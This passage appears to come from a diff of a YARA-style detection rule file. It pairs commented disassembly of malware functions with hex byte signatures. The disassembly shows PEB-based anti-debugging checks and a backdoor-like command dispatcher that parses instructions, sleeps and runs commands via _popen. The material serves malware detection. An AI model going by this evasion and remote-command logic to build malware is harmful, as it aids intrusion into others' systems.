f7d1 not ecx + .text:0x00402830 83c1ff add ecx,0xffffffff + .text:0x00402833 8bb5e0efffff mov esi,dword [ebp - 4128] + .text:0x00402839 03f1 add esi,ecx + .text:0x0040283b 8b7d08 mov edi,dword [ebp + 8] + .text:0x0040283e 8bca mov ecx,edx + .text:0x00402840 8bc1 mov eax,ecx + .text:0x00402842 c1e902 shr ecx,2 + .text:0x00402845 f3a5 rep: movsd + .text:0x00402847 8bc8 mov ecx,eax + .text:0x00402849 83e103 and ecx,3 + .text:0x0040284c f3a4 rep: movsb + .text:0x0040284e 8b95e8efffff mov edx,dword [ebp - 4120] + .text:0x00402854 2b95e0efffff sub edx,dword [ebp - 4128] + .text:0x0040285a bfa8c04000 mov edi,0x0040c0a8 + .text:0x0040285f 83c9ff or ecx,0xffffffff + .text:0x00402862 33c0 xor eax,eax + .text:0x00402864 f2ae repnz: scasb + .text:0x00402866 f7d1 not ecx + .text:0x00402868 83c1ff add ecx,0xffffffff + .text:0x0040286b 2bd1 sub edx,ecx + .text:0x0040286d 8b4508 mov eax,dword [ebp + 8] + .text:0x00402870 c6041000 mov byte [eax + edx],0 + .text:0x00402874 33c0 xor eax,eax + .text:0x00402876 loc_00402876: [7 XREFS] + .text:0x00402876 5f pop edi + .text:0x00402877 5e pop esi + .text:0x00402878 5b pop ebx + .text:0x00402879 8be5 mov esp,ebp + .text:0x0040287b 5d pop ebp + .text:0x0040287c c3 ret + */ + $c38 = { 55 8B EC B8 30 14 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 10 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 10 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 14 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 A8 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 68 A0 C0 40 00 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 2B 8D ?? ?? ?? ?? 83 C1 01 3B 4D ?? 7E ?? B8 01 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? BF A8 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 2B D1 BF A8 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B B5 ?? ?? ?? ?? 03 F1 8B 7D ?? 8B CA 8B C1 C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 95 ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? BF A8 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 2B D1 8B 45 ?? C6 04 10 00 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402880@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402880 + .text:0x00402880 FUNC: int cdecl sub_00402880( int arg0, ) [2 XREFS] + .text:0x00402880 + .text:0x00402880 Stack Variables: (offset from initial top of stack) + .text:0x00402880 4: int arg0 + .text:0x00402880 -1028: int local1028 + .text:0x00402880 -1032: int local1032 + .text:0x00402880 -1036: int local1036 + .text:0x00402880 -1040: int local1040 + .text:0x00402880 -1044: int local1044 + .text:0x00402880 -1048: int local1048 + .text:0x00402880 -1052: int local1052 + .text:0x00402880 -1056: int local1056 + .text:0x00402880 -1060: int local1060 + .text:0x00402880 -1064: int local1064 + .text:0x00402880 -1068: int local1068 + .text:0x00402880 -1072: int local1072 + .text:0x00402880 -1076: int local1076 + .text:0x00402880 + .text:0x00402880 55 push ebp + .text:0x00402881 8bec mov ebp,esp + .text:0x00402883 81ec30040000 sub esp,1072 + .text:0x00402889 53 push ebx + .text:0x0040288a 56 push esi + .text:0x0040288b 57 push edi + .text:0x0040288c c785d4fbffff0000 mov dword [ebp - 1068],0 + .text:0x00402896 c785d0fbffff0000 mov dword [ebp - 1072],0 + .text:0x004028a0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004028a6 8a5802 mov bl,byte [eax + 2] + .text:0x004028a9 889dd8fbffff mov byte [ebp - 1064],bl + .text:0x004028af 0fbe85d8fbffff movsx eax,byte [ebp - 1064] + .text:0x004028b6 85c0 test eax,eax + .text:0x004028b8 7405 jz 0x004028bf + .text:0x004028ba e841e7ffff call 0x00401000 ;sub_00401000() + .text:0x004028bf loc_004028bf: [1 XREFS] + .text:0x004028bf 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004028c5 8b4018 mov eax,dword [eax + 24] + .text:0x004028c8 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x004028cc 8985d4fbffff mov dword [ebp - 1068],eax + .text:0x004028d2 83bdd4fbffff00 cmp dword [ebp - 1068],0 + .text:0x004028d9 7405 jz 0x004028e0 + .text:0x004028db e820e7ffff call 0x00401000 ;sub_00401000() + .text:0x004028e0 loc_004028e0: [1 XREFS] + .text:0x004028e0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004028e6 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x004028ea 83e870 sub eax,112 + .text:0x004028ed 8985d0fbffff mov dword [ebp - 1072],eax + .text:0x004028f3 83bdd0fbffff00 cmp dword [ebp - 1072],0 + .text:0x004028fa 7505 jnz 0x00402901 + .text:0x004028fc e8ffe6ffff call 0x00401000 ;sub_00401000() + .text:0x00402901 loc_00402901: [1 XREFS] + .text:0x00402901 6800040000 push 1024 + .text:0x00402906 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x0040290c 51 push ecx + .text:0x0040290d e83efdffff call 0x00402650 ;sub_00402650(local1028,1024) + .text:0x00402912 83c408 add esp,8 + .text:0x00402915 85c0 test eax,eax + .text:0x00402917 740a jz 0x00402923 + .text:0x00402919 b801000000 mov eax,1 + .text:0x0040291e e90c030000 jmp 0x00402c2f + .text:0x00402923 loc_00402923: [1 XREFS] + .text:0x00402923 bfdcc04000 mov edi,0x0040c0dc + .text:0x00402928 83c9ff or ecx,0xffffffff + .text:0x0040292b 33c0 xor eax,eax + .text:0x0040292d f2ae repnz: scasb + .text:0x0040292f f7d1 not ecx + .text:0x00402931 83c1ff add ecx,0xffffffff + .text:0x00402934 51 push ecx + .text:0x00402935 68dcc04000 push 0x0040c0dc + .text:0x0040293a 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402940 52 push edx + .text:0x00402941 e80a180000 call 0x00404150 ;_strncmp(local1028,0x0040c0dc,0xffffffff) + .text:0x00402946 83c40c add esp,12 + .text:0x00402949 85c0 test eax,eax + .text:0x0040294b 755c jnz 0x004029a9 + .text:0x0040294d 68d8c04000 push 0x0040c0d8 + .text:0x00402952 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00402958 50 push eax + .text:0x00402959 e856170000 call 0x004040b4 ;_strtok(local1028,0x0040c0d8) + .text:0x0040295e 83c408 add esp,8 + .text:0x00402961 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x00402967 68d8c04000 push 0x0040c0d8 + .text:0x0040296c 6a00 push 0 + .text:0x0040296e e841170000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x00402973 83c408 add esp,8 + .text:0x00402976 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x0040297c 8b8df8fbffff mov ecx,dword [ebp - 1032] + .text:0x00402982 51 push ecx + .text:0x00402983 e8a2100000 call 0x00403a2a ;_atoi(sub_004040b4(0,0x0040c0d8)) + .text:0x00402988 83c404 add esp,4 + .text:0x0040298b 8985fcfbffff mov dword [ebp - 1028],eax + .text:0x00402991 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x00402997 69d2e8030000 imul edx,edx,1000 + .text:0x0040299d 52 push edx + .text:0x0040299e ff1538b04000 call dword [0x0040b038] ;kernel32.Sleep(0x520fba98) + .text:0x004029a4 e984020000 jmp 0x00402c2d + .text:0x004029a9 loc_004029a9: [1 XREFS] + .text:0x004029a9 bfd0c04000 mov edi,0x0040c0d0 + .text:0x004029ae 83c9ff or ecx,0xffffffff + .text:0x004029b1 33c0 xor eax,eax + .text:0x004029b3 f2ae repnz: scasb + .text:0x004029b5 f7d1 not ecx + .text:0x004029b7 83c1ff add ecx,0xffffffff + .text:0x004029ba 51 push ecx + .text:0x004029bb 68d0c04000 push 0x0040c0d0 + .text:0x004029c0 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x004029c6 50 push eax + .text:0x004029c7 e884170000 call 0x00404150 ;_strncmp(local1028,0x0040c0d0,0xffffffff) + .text:0x004029cc 83c40c add esp,12 + .text:0x004029cf 85c0 test eax,eax + .text:0x004029d1 0f8586000000 jnz 0x00402a5d + .text:0x004029d7 68d8c04000 push 0x0040c0d8 + .text:0x004029dc 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x004029e2 51 push ecx + .text:0x004029e3 e8cc160000 call 0x004040b4 ;_strtok(local1028,0x0040c0d8) + .text:0x004029e8 83c408 add esp,8 + .text:0x004029eb 8985f4fbffff mov dword [ebp - 1036],eax + .text:0x004029f1 68d8c04000 push 0x0040c0d8 + .text:0x004029f6 6a00 push 0 + .text:0x004029f8 e8b7160000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x004029fd 83c408 add esp,8 + .text:0x00402a00 8985f4fbffff mov dword [ebp - 1036],eax + .text:0x00402a06 8b95f4fbffff mov edx,dword [ebp - 1036] + .text:0x00402a0c 52 push edx + .text:0x00402a0d e818100000 call 0x00403a2a ;_atoi(sub_004040b4(0,0x0040c0d8)) + .text:0x00402a12 83c404 add esp,4 + .text:0x00402a15 8985f0fbffff mov dword [ebp - 1040],eax + .text:0x00402a1b 68d8c04000 push 0x0040c0d8 + .text:0x00402a20 6a00 push 0 + .text:0x00402a22 e88d160000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x00402a27 83c408 add esp,8 + .text:0x00402a2a 8985f4fbffff mov dword [ebp - 1036],eax + .text:0x00402a30 8b85f4fbffff mov eax,dword [ebp - 1036] + .text:0x00402a36 50 push eax + .text:0x00402a37 8b8df0fbffff mov ecx,dword [ebp - 1040] + .text:0x00402a3d 51 push ecx + .text:0x00402a3e 8b5508 mov edx,dword [ebp + 8] + .text:0x00402a41 52 push edx + .text:0x00402a42 e8d9f5ffff call 0x00402020 ;sub_00402020(arg0,sub_00403a2a(<0x004029f8>),sub_004040b4(0,0x0040c0d8)) + .text:0x00402a47 83c40c add esp,12 + .text:0x00402a4a 85c0 test eax,eax + .text:0x00402a4c 740a jz 0x00402a58 + .text:0x00402a4e b801000000 mov eax,1 + .text:0x00402a53 e9d7010000 jmp 0x00402c2f + .text:0x00402a58 loc_00402a58: [1 XREFS] + .text:0x00402a58 e9d0010000 jmp 0x00402c2d + .text:0x00402a5d loc_00402a5d: [1 XREFS] + .text:0x00402a5d bfc4c04000 mov edi,0x0040c0c4 + .text:0x00402a62 83c9ff or ecx,0xffffffff + .text:0x00402a65 33c0 xor eax,eax + .text:0x00402a67 f2ae repnz: scasb + .text:0x00402a69 f7d1 not ecx + .text:0x00402a6b 83c1ff add ecx,0xffffffff + .text:0x00402a6e 51 push ecx + .text:0x00402a6f 68c4c04000 push 0x0040c0c4 + .text:0x00402a74 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00402a7a 50 push eax + .text:0x00402a7b e8d0160000 call 0x00404150 ;_strncmp(local1028,0x0040c0c4,0xffffffff) + .text:0x00402a80 83c40c add esp,12 + .text:0x00402a83 85c0 test eax,eax + .text:0x00402a85 0f8586000000 jnz 0x00402b11 + .text:0x00402a8b 68d8c04000 push 0x0040c0d8 + .text:0x00402a90 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00402a96 51 push ecx + .text:0x00402a97 e818160000 call 0x004040b4 ;_strtok(local1028,0x0040c0d8) + .text:0x00402a9c 83c408 add esp,8 + .text:0x00402a9f 8985ecfbffff mov dword [ebp - 1044],eax + .text:0x00402aa5 68d8c04000 push 0x0040c0d8 + .text:0x00402aaa 6a00 push 0 + .text:0x00402aac e803160000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x00402ab1 83c408 add esp,8 + .text:0x00402ab4 8985ecfbffff mov dword [ebp - 1044],eax + .text:0x00402aba 8b95ecfbffff mov edx,dword [ebp - 1044] + .text:0x00402ac0 52 push edx + .text:0x00402ac1 e8640f0000 call 0x00403a2a ;_atoi(sub_004040b4(0,0x0040c0d8)) + .text:0x00402ac6 83c404 add esp,4 + .text:0x00402ac9 8985e8fbffff mov dword [ebp - 1048],eax + .text:0x00402acf 68d8c04000 push 0x0040c0d8 + .text:0x00402ad4 6a00 push 0 + .text:0x00402ad6 e8d9150000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x00402adb 83c408 add esp,8 + .text:0x00402ade 8985ecfbffff mov dword [ebp - 1044],eax + .text:0x00402ae4 8b85ecfbffff mov eax,dword [ebp - 1044] + .text:0x00402aea 50 push eax + .text:0x00402aeb 8b8de8fbffff mov ecx,dword [ebp - 1048] + .text:0x00402af1 51 push ecx + .text:0x00402af2 8b5508 mov edx,dword [ebp + 8] + .text:0x00402af5 52 push edx + .text:0x00402af6 e835f3ffff call 0x00401e30 ;sub_00401e30(arg0,sub_00403a2a(<0x00402aac>),sub_004040b4(0,0x0040c0d8)) + .text:0x00402afb 83c40c add esp,12 + .text:0x00402afe 85c0 test eax,eax + .text:0x00402b00 740a jz 0x00402b0c + .text:0x00402b02 b801000000 mov eax,1 + .text:0x00402b07 e923010000 jmp 0x00402c2f + .text:0x00402b0c loc_00402b0c: [1 XREFS] + .text:0x00402b0c e91c010000 jmp 0x00402c2d + .text:0x00402b11 loc_00402b11: [1 XREFS] + .text:0x00402b11 bfc0c04000 mov edi,0x0040c0c0 + .text:0x00402b16 83c9ff or ecx,0xffffffff + .text:0x00402b19 33c0 xor eax,eax + .text:0x00402b1b f2ae repnz: scasb + .text:0x00402b1d f7d1 not ecx + .text:0x00402b1f 83c1ff add ecx,0xffffffff + .text:0x00402b22 51 push ecx + .text:0x00402b23 68c0c04000 push 0x0040c0c0 + .text:0x00402b28 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00402b2e 50 push eax + .text:0x00402b2f e81c160000 call 0x00404150 ;_strncmp(local1028,0x0040c0c0,0xffffffff) + .text:0x00402b34 83c40c add esp,12 + .text:0x00402b37 85c0 test eax,eax + .text:0x00402b39 0f85c8000000 jnz 0x00402c07 + .text:0x00402b3f 68d8c04000 push 0x0040c0d8 + .text:0x00402b44 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00402b4a 51 push ecx + .text:0x00402b4b e864150000 call 0x004040b4 ;_strtok(local1028,0x0040c0d8) + .text:0x00402b50 83c408 add esp,8 + .text:0x00402b53 8985e4fbffff mov dword [ebp - 1052],eax + .text:0x00402b59 68d8c04000 push 0x0040c0d8 + .text:0x00402b5e 6a00 push 0 + .text:0x00402b60 e84f150000 call 0x004040b4 ;_strtok(0,0x0040c0d8) + .text:0x00402b65 83c408 add esp,8 + .text:0x00402b68 8985e4fbffff mov dword [ebp - 1052],eax + .text:0x00402b6e 8b95e4fbffff mov edx,dword [ebp - 1052] + .text:0x00402b74 52 push edx + .text:0x00402b75 e8b00e0000 call 0x00403a2a ;_atoi(sub_004040b4(0,0x0040c0d8)) + .text:0x00402b7a 83c404 add esp,4 + .text:0x00402b7d 8985dcfbffff mov dword [ebp - 1060],eax + .text:0x00402b83 68bcc04000 push 0x0040c0bc + .text:0x00402b88 6a00 push 0 + .text:0x00402b8a e825150000 call 0x004040b4 ;_strtok(0,0x0040c0bc) + .text:0x00402b8f 83c408 add esp,8 + .text:0x00402b92 8985e4fbffff mov dword [ebp - 1052],eax + .text:0x00402b98 68b8c04000 push 0x0040c0b8 + .text:0x00402b9d 8b85e4fbffff mov eax,dword [ebp - 1052] + .text:0x00402ba3 50 push eax + .text:0x00402ba4 e8fb100000 call 0x00403ca4 ;__popen(sub_004040b4(0,0x0040c0bc),<0x00402b60>,local1028,<0x00402b8a>) + .text:0x00402ba9 83c408 add esp,8 + .text:0x00402bac 8985e0fbffff mov dword [ebp - 1056],eax + .text:0x00402bb2 83bde0fbffff00 cmp dword [ebp - 1056],0 + .text:0x00402bb9 7507 jnz 0x00402bc2 + .text:0x00402bbb b801000000 mov eax,1 + .text:0x00402bc0 eb6d jmp 0x00402c2f + .text:0x00402bc2 loc_00402bc2: [1 XREFS] + .text:0x00402bc2 8b8de0fbffff mov ecx,dword [ebp - 1056] + .text:0x00402bc8 51 push ecx + .text:0x00402bc9 8b95dcfbffff mov edx,dword [ebp - 1060] + .text:0x00402bcf 52 push edx + .text:0x00402bd0 8b4508 mov eax,dword [ebp + 8] + .text:0x00402bd3 50 push eax + .text:0x00402bd4 e8f7f0ffff call 0x00401cd0 ;sub_00401cd0(arg0,sub_00403a2a(<0x00402b60>),sub_00403ca4(<0x00402b8a>,<0x00402b60>,local1028,<0x00402b8a>)) + .text:0x00402bd9 83c40c add esp,12 + .text:0x00402bdc 85c0 test eax,eax + .text:0x00402bde 7416 jz 0x00402bf6 + .text:0x00402be0 8b8de0fbffff mov ecx,dword [ebp - 1056] + .text:0x00402be6 51 push ecx + .text:0x00402be7 e817140000 call 0x00404003 ;__pclose(<0x00402ba4>) + .text:0x00402bec 83c404 add esp,4 + .text:0x00402bef b801000000 mov eax,1 + .text:0x00402bf4 eb39 jmp 0x00402c2f + .text:0x00402bf6 loc_00402bf6: [1 XREFS] + .text:0x00402bf6 8b95e0fbffff mov edx,dword [ebp - 1056] + .text:0x00402bfc 52 push edx + .text:0x00402bfd e801140000 call 0x00404003 ;__pclose(<0x00402ba4>) + .text:0x00402c02 83c404 add esp,4 + .text:0x00402c05 eb26 jmp 0x00402c2d + .text:0x00402c07 loc_00402c07: [1 XREFS] + .text:0x00402c07 bfb0c04000 mov edi,0x0040c0b0 + .text:0x00402c0c 83c9ff or ecx,0xffffffff + .text:0x00402c0f 33c0 xor eax,eax + .text:0x00402c11 f2ae repnz: scasb + .text:0x00402c13 f7d1 not ecx + .text:0x00402c15 83c1ff add ecx,0xffffffff + .text:0x00402c18 51 push ecx + .text:0x00402c19 68b0c04000 push 0x0040c0b0 + .text:0x00402c1e 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00402c24 50 push eax + .text:0x00402c25 e826150000 call 0x00404150 ;_strncmp(local1028,0x0040c0b0,0xffffffff) + .text:0x00402c2a 83c40c add esp,12 + .text:0x00402c2d loc_00402c2d: [4 XREFS] + .text:0x00402c2d 33c0 xor eax,eax + .text:0x00402c2f loc_00402c2f: [5 XREFS] + .text:0x00402c2f 5f pop edi + .text:0x00402c30 5e pop esi + .text:0x00402c31 5b pop ebx + .text:0x00402c32 8be5 mov esp,ebp + .text:0x00402c34 5d pop ebp + .text:0x00402c35 c3 ret + */ + $c39 = { 55 8B EC 81 EC 30 04 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF DC C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 68 DC C0 40 00 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 75 ?? 68 D8 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 69 D2 E8 03 00 00 52 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF D0 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 68 D0 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 0F 85 ?? ?? ?? ?? 68 D8 C0 40 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF C4 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 68 C4 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 0F 85 ?? ?? ?? ?? 68 D8 C0 40 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF C0 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 68 C0 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 0F 85 ?? ?? ?? ?? 68 D8 C0 40 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 68 D8 C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 89 85 ?? ?? ?? ?? 68 BC C0 40 00 6A 00 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 68 B8 C0 40 00 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 EB ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 EB ?? BF B0 C0 40 00 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 51 68 B0 C0 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402c40@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00402c40 + .text:0x00402c40 FUNC: int cdecl sub_00402c40( ) [2 XREFS] + .text:0x00402c40 + .text:0x00402c40 Stack Variables: (offset from initial top of stack) + .text:0x00402c40 -1028: int local1028 + .text:0x00402c40 -2052: int local2052 + .text:0x00402c40 -3076: int local3076 + .text:0x00402c40 -4100: int local4100 + .text:0x00402c40 -4104: int local4104 + .text:0x00402c40 -4108: int local4108 + .text:0x00402c40 -4112: int local4112 + .text:0x00402c40 + .text:0x00402c40 55 push ebp + .text:0x00402c41 8bec mov ebp,esp + .text:0x00402c43 b80c100000 mov eax,0x0000100c + .text:0x00402c48 e8230d0000 call 0x00403970 ;__alloca_probe() + .text:0x00402c4d 53 push ebx + .text:0x00402c4e 56 push esi + .text:0x00402c4f 57 push edi + .text:0x00402c50 c785f8efffff0000 mov dword [ebp - 4104],0 + .text:0x00402c5a c785f4efffff0000 mov dword [ebp - 4108],0 + .text:0x00402c64 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402c6a 8a5802 mov bl,byte [eax + 2] + .text:0x00402c6d 889dfcefffff mov byte [ebp - 4100],bl + .text:0x00402c73 0fbe85fcefffff movsx eax,byte [ebp - 4100] + .text:0x00402c7a 85c0 test eax,eax + .text:0x00402c7c 7405 jz 0x00402c83 + .text:0x00402c7e e87de3ffff call 0x00401000 ;sub_00401000() + .text:0x00402c83 loc_00402c83: [1 XREFS] + .text:0x00402c83 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402c89 8b4018 mov eax,dword [eax + 24] + .text:0x00402c8c 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00402c90 8985f8efffff mov dword [ebp - 4104],eax + .text:0x00402c96 83bdf8efffff00 cmp dword [ebp - 4104],0 + .text:0x00402c9d 7405 jz 0x00402ca4 + .text:0x00402c9f e85ce3ffff call 0x00401000 ;sub_00401000() + .text:0x00402ca4 loc_00402ca4: [1 XREFS] + .text:0x00402ca4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402caa 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00402cae 83e870 sub eax,112 + .text:0x00402cb1 8985f4efffff mov dword [ebp - 4108],eax + .text:0x00402cb7 83bdf4efffff00 cmp dword [ebp - 4108],0 + .text:0x00402cbe 7505 jnz 0x00402cc5 + .text:0x00402cc0 e83be3ffff call 0x00401000 ;sub_00401000() + .text:0x00402cc5 loc_00402cc5: [2 XREFS] + .text:0x00402cc5 b901000000 mov ecx,1 + .text:0x00402cca 85c9 test ecx,ecx + .text:0x00402ccc 0f848e000000 jz 0x00402d60 + .text:0x00402cd2 6800040000 push 1024 + .text:0x00402cd7 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402cdd 52 push edx + .text:0x00402cde 6800040000 push 1024 + .text:0x00402ce3 8d8500f0ffff lea eax,dword [ebp - 4096] + .text:0x00402ce9 50 push eax + .text:0x00402cea 6800040000 push 1024 + .text:0x00402cef 8d8d00f8ffff lea ecx,dword [ebp - 2048] + .text:0x00402cf5 51 push ecx + .text:0x00402cf6 6800040000 push 1024 + .text:0x00402cfb 8d9500f4ffff lea edx,dword [ebp - 3072] + .text:0x00402d01 52 push edx + .text:0x00402d02 e8a9e7ffff call 0x004014b0 ;sub_004014b0(local3076,1024,local2052,1024,local4100,1024,local1028) + .text:0x00402d07 83c420 add esp,32 + .text:0x00402d0a 85c0 test eax,eax + .text:0x00402d0c 7407 jz 0x00402d15 + .text:0x00402d0e b801000000 mov eax,1 + .text:0x00402d13 eb4d jmp 0x00402d62 + .text:0x00402d15 loc_00402d15: [1 XREFS] + .text:0x00402d15 8d8500f0ffff lea eax,dword [ebp - 4096] + .text:0x00402d1b 50 push eax + .text:0x00402d1c e8090d0000 call 0x00403a2a ;_atoi(local4100) + .text:0x00402d21 83c404 add esp,4 + 